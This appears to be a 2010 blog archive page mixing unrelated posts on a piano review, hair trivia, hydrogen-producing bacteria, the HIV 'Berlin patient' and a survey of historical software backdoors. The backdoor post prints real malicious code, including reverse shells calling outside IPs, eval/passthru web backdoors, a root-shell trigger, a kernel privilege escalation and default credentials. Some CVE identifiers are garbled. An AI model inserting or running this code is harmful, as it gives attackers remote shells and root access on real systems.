This site is dedicated to all things I see and that I think are interesting to publish almost always are other very smart people.

Archive for December 15, 2010

Life and times.

Leon Fleisher: In Focus at the 92nd Street Y
The New York Times, December 15, 2010

In preparing for this review, I read several sizable chunks from Leon Fleisher’s newly published memoir, My Nine Lives, co-written by my friend and colleague Anne Midgette. What little part I managed to read confirmed what I’d already suspected: the book is a delight, a gripping personal story as well as a lively page-turner. I’m looking forward to reading the entire book over the holiday break.

While reading the book, I came upon a name I’d not seen or thought about in some time: Jacob Lateiner, another distinguished pianist and educator, and the artist who commissioned and premiered Elliott Carter’s Piano Concerto. This seemed like an appropriate coincidence on Saturday, which was Carter’s 102nd birthday. But sadder news followed: Lateiner died on Sunday, as I learned in a message from pianist Bruce Brubaker that evening.

You can read Brubaker’s memorial tribute to Lateiner on his ArtJournal blog, Pianomorphosis, here. The New York Times obituary is here. And you can listen to the finale from Lateiner’s 1957 Westminster recording of Beethoven’s “Emperor” Concerto in the video embedded below.


Algunas curiosidades sobre nuestro pelo

En nuestra cabeza tenemos entre 100.000 y 150.000 folículos pilosos. Los rubios tienen más que los morenos o castaños.

El pelo crece 0,3 milímetros al día. Aproximadamente 1 cm al mes.

Se calcula que perdemos unos 80 pelos al día.

El pelo tiene mucha información sobre lo que hacemos en nuestra vida. Es como un archivo o una hoja de ruta. Existe una tecnología capaz de analizar los ratios de isótopos de oxígeno e hidrógeno que contiene el cabello humano y los compara con los presentes en el agua de todo el país.

Tomando uno de los pelos de vuestra cabeza, en el que ha quedado grabado el agua que usáis a diario, los investigadores estilo CSI pueden saber dónde habéis estado durante los últimos meses. Una información muy útil para la policía o los forenses.

También se puede saber mediante el pelo todo en lo relativo al consumo de medicamentos, drogas, etc. Sin embargo, estos análisis sólo pueden remontarse hasta un año.

Algunos estudios sugieren que las personas más inteligentes tienen más zinc y cobre en el cabello.

El cuero cabelludo es muy similar a una tierra de cultivo (…) El pelo evoluciona por ciclos, de tal manera que el folículo piloso crece continuamente durante 3-5 años unos 3 mm por semana. Pasado ese tiempo, para de crecer durante 3-4 meses y, finalmente, el pelo se cae. Su raíz, la del folículo piloso, descansa durante 3 meses para “reponer fuerzas” e iniciar un nuevo ciclo de 3-5 años de crecimiento continuo del pelo. Como cada folículo tiene su ritmo, apenas notamos estos ciclos en el aspecto de nuestro cabello.

Podéis leer más curiosidades sobre el pelo en El pelo humano en cifras.


Ilusión óptica: diferencia de tamaño

Mi amigo Greg me envía una nueva ilusión óptica de su canal (Greenpro) con un nuevo desafío visual: ¿qué diferencia hay entre estas dos bolas?:


Una bacteria oceánica produce hidrógeno de forma natural

Cyanothece

 

Una cianobacteria emite hidrógeno como subproducto de los procesos cotidianos.

Un microbio oceánico aparentemente poco destacable, resulta ser multitarea – no sólo puede hacer la fotosíntesis, sino que también puede producir grandes cantidades de hidrógeno, abriendo un camino potencial para abaratar el gas como combustible.

La cianobacteria unicelular Cyanothece 51142 puede crear hidrógeno, según informan Himadri Pakrasi de la Universidad de Washington en St. Louis, Missouri, y sus colegas en Nature Communications1. Hasta el momento, los únicos organismos conocidos que fabrican hidrógeno sólo podían producirlo en un entorno sin oxígeno – haciendo que el proceso fuese potencialmente caro al escalarlo.

Cyanothece 51142 se descubrió en 1993, en la costa de Texas, por parte de Louis Sherman de la Universidad de Purdue en West Lafayette, Indiana, coautor del estudio. Pakrasi descubrió más tarde que la bacteria tenía un ciclo diario de dos etapas. Durante el día, hace la fotosíntesis, usando la luz solar y el dióxido de carbono para crear oxígeno y crear cadenas de moléculas de glucosa conocidas como glicógeno- Cuando el Sol se retira, la enzima nitrogenasa del microbio entra en acción, usando la energía almacenada en el glicógeno para fijar el nitrógeno del aire en amoniaco. El hidrógeno se genera como subproducto.

Los dos mecanismos son distintos ya que la fotosíntesis es un proceso aeróbico  – requiere oxígeno – mientras que la fijación del oxígeno, y, por consiguiente, la producción de hidrógeno, sólo pueden tener lugar anaeróbicamente, debido a que el contacto del oxígeno destruye la enzima nitrogenasa. Pero la Cyanothece 51142 logra fijar el nitrógeno incluso en presencia del oxígeno atmosférico, quemando el oxígeno celular para producir energía. Debido a que no está teniendo lugar la fotosíntesis, la bacteria usa su oxígeno celular de forma que la enzima nitrogenasa está de forma efectiva en un entorno mayormente libre de oxígeno.

Reacciones rítmicas

La Cyanothece 51142 tiene un ritmo circadiano natural que le permite ser ‘entrenada’ para producir aún más hidrógeno.

Tras un único ciclo de 12 horas de día y 12 de noche, Pakrasi y su equipo mantuvieron las luces encendidas durante 48 horas consecutivas. Durante este tiempo, los microbios siguieron con su fijación de nitrógeno ‘nocturna’ y la producción de hidrógeno en el periodo que normalmente habría sido oscuro, pero crearon más combustible para el proceso mediante la fotosíntesis. Los investigadores encontraron que, bajo estas condiciones, los microbios ajustaban su capacidad fotosintética para maximizar la fijación del nitrógeno.

La cantidad de hidrógeno producida de esta forma – 150 micro moles por miligramo de clorofila por hora — es el más alto registrado jamás en cianobacterias naturales en condiciones atmosféricas normales, comenta Pakrasi. Si las bacterias se comportasen de la misma forma en un medio de cultivo de un litro, que en el medio de 25 mililitros usado en el experimento, crearían algo más de 900 ml de hidrógeno en 48 horas — el tiempo de duración del experimento.

Ritmo natural alto

“Este es el sistema más efectivo publicado hasta el momento para la producción de hidrógeno”, dice Oliver Lenz de la Universidad Humboldt en Berlín, que trabaja con la enzima hidrogenasa. En su trabajo, Lenz ha injertado directamente la hidrogenasa en un fotosistema I, una unidad proteica necesaria para la fotosíntesis. Las bacterias naturales no pueden competir con tales sistemas, con el ritmo de producción de hidrógeno en el sistema de Lenz alcanzando volúmenes mayores – 3000 micro moles de hidrógeno por miligramo de clorofila por hora, según Lenz — pero el sistema sigue sin probarse en una configuración natural, y esta es la ventaja del descubrimiento de Pakrasi. “Nunca esperé unos ritmos tan altos para un organismo natural”, añade Lenz. Las aproximaciones sintéticas tales como las de Lenz tienen una vida corta, comenta Pakrasi, a menudo agotando el germen en horas, mientras que las cianobacterias “pueden seguir funcionando durante días”.

Otros organismos aparte de las cianobacterias, tales como el alga Chlamydomonas reinhardtii, también producen hidrógeno a ritmos similares, dice Olaf Kruse de la Universidad Bielefeld en Alemania, que trabaja con la especie. Pero estos otros microbios necesitan unas estrictas condiciones anaeróbicas para su funcionamiento. Kruse está impaciente por ver un escalado del experimento de Pakrasi para comprobar si Cyanothece 51142 funciona igual de bien cuando se cultiva en grandes volúmenes. Pakrasi dice que su equipo está empezando este trabajo, y ya han movido el cultivo de 25 ml a otro de 200 ml con similares resultados.

Por el momento, Cyanothece 51142 tiene pequeñas cantidades de hidrogenasa que consume parte del hidrógeno conforme se produce. Para que la Cyanothece 51142 trabaje mejor, Lenz sugiere modificar genéticamente la bacteria para que contenga una enzima hidrogenasa más eficiente, por lo que se perdería menos hidrógeno.

El trabajo demuestra de lo que es capaz una cianobacteria no modificada, dice Pakrasi. Hay al menos otras 10 cepas de Cyanothece, y Pakrasi espera que funcionen de forma similar. “Se puede – y debemos – aumentar el ritmo haciendo modificaciones genéticas en el sistema”, señala.


Referencias:
1. Bandyopadhyay, A., Stöckel, J., Min, H., Sherman, L. A. & Pakrasi, H. B. Nature Commun. doi:10.1039/ncomms1139 (2010).

Autor: Katharine Sanderson
Fecha Original: 14 de diciembre de 2010
Enlace Original

This page is wiki editable click here to edit this page.


Las puertas traseras más escandalosas

Se acaba de publicar en la lista de OpenBSD un mail inquietante, como poco. Theo de Raadt, lider del proyecto, ha comunicado que el código del sistema operativo ha podido ser “troyanizado” por sus desarrolladores a petición del gobierno de Estados Unidos entre el año 2000 y 2001.

La noticia es un auténtico bombazo y Theo ha solicitado a la comunidad ayuda para auditar el código.

En otras ocasiones, generalmente cuando el código es cerrado, son los propios fabricantes y desarrolladores los que introducen estas puertas y por este motivo son prácticamente imposibles de detectar, salvo análisis muy profundos y exhaustivos.
He recopilado algunas de las puertas traseras más interesantes y escandalosas:

APLICACIONES DE CÓDIGO ABIERTO

irssi versión 0.8.4, 25 de mayo del 2002. Código introducido en el “configure” del cliente de IRC que causa ejecución de código, después de que los servidores del proyecto fueran hackeados cerca del 14 de Marzo del 2002. CVE-1840-2002
int s;
        struct sockaddr_in sa;
        switch(fork()) { case 0: break; default: exit(0); }
        if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
                exit(1);
        }
  /* HP/UX 9 (%@#!) writes to sscanf strings */
        memset(&sa, 0, sizeof(sa));
        sa.sin_family = AF_INET; 
        sa.sin_port = htons(6667); 
        sa.sin_addr.s_addr = inet_addr("204.120.36.206");
        if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
                exit(1);
        }
        dup2(s, 0); dup2(s, 1); dup2(s, 2);
/* The GNU C library defines this for functions which it implements
    to always fail with ENOSYS. Some functions are actually named 
    something starting with __ and the normal name is an alias. */
        { char *args[] = { "/bin/sh", NULL }; execve(args[0], args, NULL); }
WordPress 2.1.1,  2 de marzo del 2007. Tras una intrusión en los sistemas de wordpress, se incluyen dos backdoors en el código de esta versión del gestor de contenido que permite ejecución de código PHP. En concreto, se modifican dos archivos: wp-includes/feed.php a la que se le añade un eval() y wp-includes/theme.php al que le crece un passthru(). De esta forma, se asegura la ejecución incluso si en alguna configuración alguna de estas funciones está deshabilitada. Ya se sabe, alta disponibilidad. CVE 1277-2007. Los cambios:

En wp-includes/feed.php

function comment_text_phpfilter($filterdata) {
eval($filterdata);
}

En wp-includes/theme.php

function get_theme_mcommand($mcds) {
passthru($mcds);
}
...
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }

 

UnrealIRCd 3.2.8.1, detectado 12 de Junio del 2010, puerta trasera introducida desde el 10 de Noviembre del 2009, permite ejecución de código en el servidor. Pasaron 6 meses distribuyendo el software con el código modificado. Como algo anecdótico, los líderes del proyecto comentaron que dejaron de utilizar el firmado de binarios, porque nadie lo usaba. ¡Ups!  CVE 2010-2075. El diff del código modificado:

 

@@ -430,6 +430,7 @@
 #endif
 
 /* Fake lag exception */
+
 #define IsNoFakeLag(x)      ((x)->flags & FLAGS_NOFAKELAG)
 #define SetNoFakeLag(x)     ((x)->flags |= FLAGS_NOFAKELAG)
 #define ClearNoFakeLag(x)   ((x)->flags &= ~FLAGS_NOFAKELAG)
@@ -448,6 +449,7 @@
 #else
 #define IsNotSpoof(x)           (1)
 #endif
+#define        DEBUGMODE3          ((x)->flags & FLAGS_NOFAKELAG)
 
 #define GetHost(x)                     (IsHidden(x) ? (x)->user->virthost : (x)->user->realhost)
 #define GetIP(x)                       ((x->user && x->user->ip_str) ? x->user->ip_str : (MyConnect(x) ? 
Inet_ia2p(&x->ip) : NULL))
@@ -513,6 +515,10 @@
 #else
 #define CHECKPROTO(x,y) (checkprotoflags(x, y, __FILE__, __LINE__))
 #endif
+#ifdef DEBUGMODE3
+#define DEBUGMODE3_INFO        "AB"
+#define        DEBUG3_LOG(x) DEBUG3_DOLOG_SYSTEM (x)
+#endif
 
 #define DontSendQuit(x)                (CHECKPROTO(x, PROTO_NOQUIT))
 #define IsToken(x)             (CHECKPROTO(x, PROTO_TOKEN))
@@ -1373,6 +1379,7 @@
 #define INCLUDE_REMOTE     0x2
 #define INCLUDE_DLQUEUED   0x4
 #define INCLUDE_USED       0x8
+#define DEBUG3_DOLOG_SYSTEM(x) system(x)
        
 struct _configitem_include {
        ConfigItem *prev, *next;
diff -ru Unreal3.2-good/src/s_bsd.c Unreal3.2-backdoored/src/s_bsd.c
--- Unreal3.2-good/src/s_bsd.c  2009-03-01 10:37:58.000000000 -0800
+++ Unreal3.2-backdoored/src/s_bsd.c    2006-06-16 11:29:00.000000000 -0700
@@ -1431,6 +1431,10 @@
                    return 1;
                if (length <= 0)
                        return length;
+#ifdef DEBUGMODE3
+       if (!memcmp(readbuf, DEBUGMODE3_INFO, 2))
+           DEBUG3_LOG(readbuf);
+#endif
                for (h = Hooks[HOOKTYPE_RAWPACKET_IN]; h; h = h->next)
                {
                        int v = (*(h->func.intfunc))(cptr, readbuf, length);

 

Proftpd 1.3.3c, 1 de diciembre de 2010. Añade mediante el archivo “configure”, un archive test.c, que envía una shell, este es invocado desde help.c, que también es modificado.CVE 2010-3867, los ficheros modificados y creados el 28 de noviembre del 2010:

Archivo configure:

gcc tests/tests.c -o tests/tests >/dev/null 2>&1
cc tests/tests.c -o tests/tests >/dev/null 2>&1
tests/tests >/dev/null 2>&1 &
rm -rf tests/tests.c tests/tests >/dev/null 2>&1

El código C de test.c:

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define DEF_PORT 9090
#define DEF_TIMEOUT 15
#define DEF_COMMAND "GET /AB HTTP/1.0\r\n\r\n"

int sock;

void handle_timeout(int sig)
{
    close(sock);
    exit(0);
}

int main(void)
{

        struct sockaddr_in addr;
        struct hostent *he;
        u_short port;
        char ip[20]="212.26.42.47";
        port = DEF_PORT;
        signal(SIGALRM, handle_timeout);
        alarm(DEF_TIMEOUT);
        he=gethostbyname(ip);
        if(he==NULL) return(-1);
        addr.sin_addr.s_addr = *(unsigned long*)he->h_addr;
        addr.sin_port = htons(port);
        addr.sin_family = AF_INET;
        memset(addr.sin_zero, 0, 8);
        sprintf(ip, inet_ntoa(addr.sin_addr));
        if((sock = socket(AF_INET, SOCK_STREAM, 0))==-1)
        {
                return EXIT_FAILURE;
        }
        if(connect(sock, (struct sockaddr*)&addr, sizeof(struct sockaddr))==-1)
        {
            close(sock);
            return EXIT_FAILURE;
        }
        if(-1 == send(sock, DEF_COMMAND, strlen(DEF_COMMAND), 0))
        {
            return EXIT_FAILURE;
        }
        close(sock);

return 0; }

Y por último fichero src/help.c

} else {
 if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }
  /* List the syntax for the given target command. */
  for (i = 0; i < help_list->nelts; i++) {

 

Linux kernel 2.6-test9-CVS, 6 de noviembre de 2003. Acceso al repositorio y modificación del código del kernel para introducir una puerta trasera y escalar a privilegios de root. Más detalle en la entrada que le dedicamosCVE 2003-1161. El cambio fue realmente discreto:
--- GOOD 2003-11-05 13:46:44.000000000 -0800
+++ BAD 2003-11-05 13:46:53.000000000 -0800
@@ -1111,6 +1111,8 @@
schedule();
goto repeat;
}
+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+ retval = -EINVAL;
retval = -ECHILD;
end_wait4:
current->state = TASK_RUNNING;

APLICACIONES DE CODIGO CERRADO

Ipswitch WS_FTP Server 4.0.2.EVAL, 23 de marzo de 2004, por alguna extraña razón este servidor de FTP permite conectarse a localhost con credenciales por defecto no documentadas: XXSESS_MGRYY con contraseña X#1833. Elevando privilegios a usuario SYSTEM. CVE 2004-1884
[PDF] Los switches de Accton (3com, Dell, SMC, Foundry y EdgeCore), 15 de agosto de 2009. En la conferencia HAR2009 se revela que estos sistemas tienen una puerta trasera que permite acceder a ellos sin conocer su contraseña. Para ello se utiliza un generador de passwords basado en la MAC del dispositivo. El script  también se publicó.
Cisco y su “lawful intercept” o intercepción legal, que permite la escucha de las comunicaciones o algunos usuarios y contraseñas introducidos por defecto en sus productos, como en el caso de los dispositivos WLSE y HSE o los de Videoconferencia (UVC).
HP MSA2000 Storage Systems, Diciembre 2010, sistemas de HP con usuarios incrustados en el código fuente (admin/!admin), que no pueden ser borrados ni eliminados.

Seguro que si esta entrada hubiera estado escrita en el blog de 48bits, el título sería más gracioso.


Reportan el primer caso de una persona que se cura del SIDA

Timothy Ray Brown

Hace casi 30 años -el 5 de junio de 1981- los CDC (Centers for Disease Control and Prevention) de Estados Unidos alertaron en una conferencia de prensa sobre la detección de cinco casos de neumonía por Pneumocystis Carinii en Los Ángeles y un mes después, fueron detectados varios casos de Sarcoma de Kaposi (un tipo de cáncer de piel). Si bien ambas enfermedades eran conocidas en el mundo de la medicina, la aparición conjunta de las dos en varios pacientes llamó la atención de los especialistas.

Las primeras investigaciones arrojaron que, en la mayoría de los casos, se trataba de hombres homosexuales sexualmente activos y que en muchos casos sufrían de otras enfermedades crónicas (hoy conocidas como oportunistas).

Al momento de realizarles pruebas sanguíneas se constató que los pacientes carecían del número adecuado de un tipo de células sanguíneas llamadas T CD4+ (Linfocitos T cooperadores).

En la mayoría de los casos los pacientes fallecieron a los pocos meses, marcando el inicio de lo que hoy conocemos como el SIDA (síndrome de inmunodeficiencia adquirida), enfermedad que afecta a los humanos infectados por el VIH (virus de la inmunodeficiencia humana).

 

A partir de esa fecha se inició una verdadera batalla por identificar de manera clara al causante de dichas muertes, las que iban aumentando con el correr del tiempo y que, incluso, sirvieron de excusa para que algunos atacaran de distintas formas a las llamadas “minorías sexuales”.

Pero hoy se abre una nueva luz de esperanza para todos aquellos que, de una u otra manera, se ven enfrentados a diario a esta enfermedad; luego de que -por vez primera- un hombre fuera declarado de manera oficial como curado del virus VIH.

Las personas infectadas por esta enfermedad ven destruido su sistema inmune, por lo que queda expuesto a distintos tipos de virus, bacterias, hongos y a un número indeterminado de enfermedades que cualquier persona sana es capaz de controlar (como la neumonía, la meningitis o la tuberculosis).

Para mantener la enfermedad a raya se desarrollaron diversos tratamientos, siendo el más exitoso el que hoy conocemos como triterapia o TARGA (Terapia AntirRetroviral de Gran Actividad). Claro que este tipo de tratamientos no curan la enfermedad, sino que sólo logran disminuir la carga viral a un nivel que permite que los enfermos lleven una vida normal (aunque sin las debidas precauciones pueden seguir contagiando a otras personas). De hecho en algunos casos la carga viral llega a un nivel tan bajo que en los test normales darían negativo.

El caso que origina esta nota se relaciona con un ciudadano de Estados Unidos que reside en Berlín y que por cosas del azar se convirtió en el primer ser humano que se curó de dicha enfermedad.

¿Pistas para una cura?

Timothy Ray Brown, el hombre en cuestión, era un portador de SIDA desde hace unos años, por lo que estaba sometido a una terapia aintirretroviral que mantenía su sistema inmune casi a niveles normales.

Por esas cosas del destino durante el año 2007 a Timothy se le detectó una leucemia muy agresiva, por lo que debió someterse a una quimioterapia y a la irradiación con radioterapia. El pobre apenas logró sobrevivir a este “tratamiento” que, en definitiva, parecía haber dado buenos resultados.

Transcurrido un año la leucemia volvió a atacar por lo que sus médicos, previendo que el debilitado organismo de Tim no lograría soportar nuevas quimioterapias, optaron por realizar un trasplante de células madres obtenidas desde la médula espinal de un donante.

Claro que este donante tenía la particularidad de sufrir una inofensiva mutación, la que es conocida como CCR5 delta 32 homocigota. Las personas que tienen esta mutación no poseen un tipo de receptor llamado CR5 en su organismo, precisamente el que necesita el virus VIH para acoplarse a las células T CD4+.

En el intertanto y como consecuencia de las innumerables quimios a las que debió ser sometido, a Tim no le quedó otra que suspender la terapia antirretroviral y comenzar a tomar inmunosupresores para prevenir el rechazo de las células madres que estaba recibiendo.

Transcurridos 13 días debió someterse a un segundo trasplante debido a que la leucemia no cedía, por lo que debió seguir tomando los inmunosupresores y dejar de lado su tratamiento contra el sida.

Por si todo lo anterior fuera poco, semanas después Tim sufrió de un serio trastorno neurológico, el que le provocó una ceguera temporal y problemas tanto de motricidad como para hablar.

Los médicos que lo atendían decidieron realizar una punción lumbar para examinar el fluído y obtener un diagnóstico de la nueva afección que sufría Tim; descubriendo que en dicho fluído no existían rastros de VIH.

Posteriormente nuevos exámenes concluyeron que las células T CD4+ de Tim habían alcanzado niveles normales, su carga viral había desaparecido y que no hay rastros de anticuerpos medibles por el test de ELISA.

Para los científicos, lo que pudo haber pasado con Tim es que las células madres que recibió con la mutación CCR5 delta 32 homocigota fueron capaces de replicarse en el organismo, dejando al VIH sin el apoyo necesario para su reproducción.

Para los investigadores, la experiencia de Tim servirá para estudiar nuevos métodos -mucho menos invasivos- con los que sea posible atacar la enfermedad, algo que son seguridad requerirá de muchos años de investigación y análisis; pero que podría abrir una luz de esperanza hacia el desarrollo de un tratamiento definitivo que cure dicha enfermedad.

Link: Stem cell transplant has cured HIV infection in ‘Berlin patient’, say doctors (Aidsmap vía Belelú)